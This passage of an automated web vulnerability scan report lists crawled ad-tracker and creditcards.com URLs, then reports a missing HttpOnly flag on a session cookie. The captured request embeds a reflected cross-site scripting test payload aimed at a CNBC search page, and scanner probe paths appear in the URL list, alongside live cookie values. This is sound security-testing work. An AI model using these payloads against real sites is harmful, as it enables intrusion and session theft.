http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm
http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm
http://d7.zedo.com/img/bh.gif
http://dis.ny.us.criteo.com/dis/dis.aspx
http://idcs.interclick.com/Segment.aspx
http://ilslaunch.app2.hubspot.com/salog.js.aspx
http://image2.pubmatic.com/AdServer/Pug
http://imp.constantcontact.com/imp/cmp.jsp
http://js.revsci.net/common/pcx.js
http://js.revsci.net/gateway/gw.js
http://leadback.advertising.com/adcedge/lb
http://map.media6degrees.com/orbserv/hbpix
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1726433512@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1777416209@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1815229995@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1861592040@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1885484252@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1930646721@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://optimized-by.rubiconproject.com/a/dk.js
http://p.opt.fimserve.com/bht/
http://pbid.pro-market.net/engine
http://phoenix.untd.com/TRCK/RGST
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
http://pix04.revsci.net/G07608/a4/0/0/pcx.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/118546994.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/152539728.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/153416135.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/167338616.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/174739392.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/252539645.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266715150.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/266829410.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/271822828.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/306033605.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/31221949.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/319879025.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/321200067.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/325815715.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/329181290.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/351391247.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/47135208.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/474207582.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/518130278.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/541993060.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/572738137.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/579855884.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/602675862.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/603496051.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/609031637.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/609523113.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/61287048.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/656764106.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/697771504.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/7130573.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/715243108.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/727551731.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/743305953.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/743306396.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/747675233.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/773834418.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/783069022.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/791107298.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/837302366.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/851863014.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/85990292.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/870883424.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/948985352.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/97296821.js
http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/beacon
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=16893018/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=22319790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=33615280/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=43472790/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=46970102/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=61218373/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63221864/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=63734715/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=77103321/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860
http://rover.ebay.com/ar/1/76417/4
http://rover.ebay.com/ar/1/76418/4
http://rp.gwallet.com/r1/ucm
http://rs.gwallet.com/r1/pixel/x113
http://rs.gwallet.com/r1/pixel/x9r8101111
http://rs.gwallet.com/r1/pixel/x9r8962146
http://rt.legolas-media.com/lgrt
http://sales.liveperson.net/hc/55601019/
http://sales.liveperson.net/hc/55601019/
http://sales.liveperson.net/hc/55601019/
http://sales.liveperson.net/hc/57386690/
http://sales.liveperson.net/hc/57386690/
http://segment-pixel.invitemedia.com/pixel
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://spotlight.creditcards.com/www/delivery/ajs.php
http://spotlight.creditcards.com/www/delivery/lg.php
http://sync.mathtag.com/sync
http://t2.trackalyzer.com/trackalyze.asp
http://tacoda.at.atwola.com/rtx/r.gif
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tags.bluekai.com/site/2831
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/3561
http://tags.bluekai.com/site/38
http://tags.bluekai.com/site/3834
http://tags.bluekai.com/site/450
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://va.px.invitemedia.com/pixel
http://va.px.invitemedia.com/set_partner_uid
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.bizographics.com/collect/
http://www.burstnet.com/enlightn/7644//AC95/
http://www.capitalone.com/creditcards/gateway/
http://www.cnbc.com/
http://www.cnbc.com/id/32372321
http://www.cnbc.com/id/43422860
http://www.cnbc.com/redirect.aspx
http://www.creditcards.com/css/credit-cards-print.css
http://www.creditcards.com/css/credit-cards.css
http://www.creditcards.com/images/404-footer-security-lock.gif
http://www.creditcards.com/images/Best-Credit-Cards.gif
http://www.creditcards.com/images/Credit-Cards-Compare.gif
http://www.creditcards.com/images/Credit-Cards-Instant-Approval.gif
http://www.creditcards.com/images/Credit-Cards-Search.gif
http://www.creditcards.com/images/accept-credit-cards.gif
http://www.creditcards.com/images/apply-credit-cards.gif
http://www.creditcards.com/images/apply-now.gif
http://www.creditcards.com/images/bank-credit-cards.gif
http://www.creditcards.com/images/blue-bg.gif
http://www.creditcards.com/images/cccom_logo_114x44.gif
http://www.creditcards.com/images/credit-card-news-and-advice.gif
http://www.creditcards.com/images/credit-card-offer-amex.gif
http://www.creditcards.com/images/credit-card-offer-discover.gif
http://www.creditcards.com/images/credit-card-offer-mastercard.gif
http://www.creditcards.com/images/credit-card-offer-visa.gif
http://www.creditcards.com/images/credit-card-offers.gif
http://www.creditcards.com/images/credit-card-tools.gif
http://www.creditcards.com/images/credit-cards-logo-2.gif
http://www.creditcards.com/images/fb-icon.png
http://www.creditcards.com/images/loading.gif
http://www.creditcards.com/images/menu.gif
http://www.creditcards.com/images/new-loading.gif
http://www.creditcards.com/images/rss-icon.png
http://www.creditcards.com/images/search-by-credit-quality.gif
http://www.creditcards.com/images/security-lock-dark.gif
http://www.creditcards.com/images/security-lock-light.gif
http://www.creditcards.com/images/spacer_light_blue.gif
http://www.creditcards.com/images/truste-seal-ctv.gif
http://www.creditcards.com/images/twtr-icon.png
http://www.creditcards.com/images/yt-icon.png
http://www.creditcards.com/javascript/application.js
http://www.creditcards.com/javascript/bluekai.js
http://www.creditcards.com/javascript/mvt/tooltip.js
http://www.creditcards.com/javascript/s_code.js
http://www.creditcards.com/javascript/thickbox/jquery.js
http://www.creditcards.com/javascript/thickbox/mvt/interstitial.css
http://www.creditcards.com/javascript/thickbox/mvt/interstitial.js
http://www.creditcards.com/javascript/thickbox/mvt/jquery.js
http://www.creditcards.com/javascript/thickbox/thickbox.css
http://www.creditcards.com/javascript/thickbox/thickbox.js
http://www.creditcards.com/javascript/tynt.js
http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529)
http://www.creditcards.com/oc/Netsparker3643bc898af148cda9073d161734fcbb/
http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/
http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/
http://www.creditcards.com/sb.php
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/cartdrpdwn_Checkout.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange_arrow.gif
http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay
http://www.wtp101.com/admeld_sync

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://afe.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://afe.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=d14f5599fcc427d0b6d779a18539; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=4749&sz=300x250&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308305453032%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fburp%252Fshow%252F8&r=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&rnd=872182 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308305453032&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 200 OK
Server: nginx
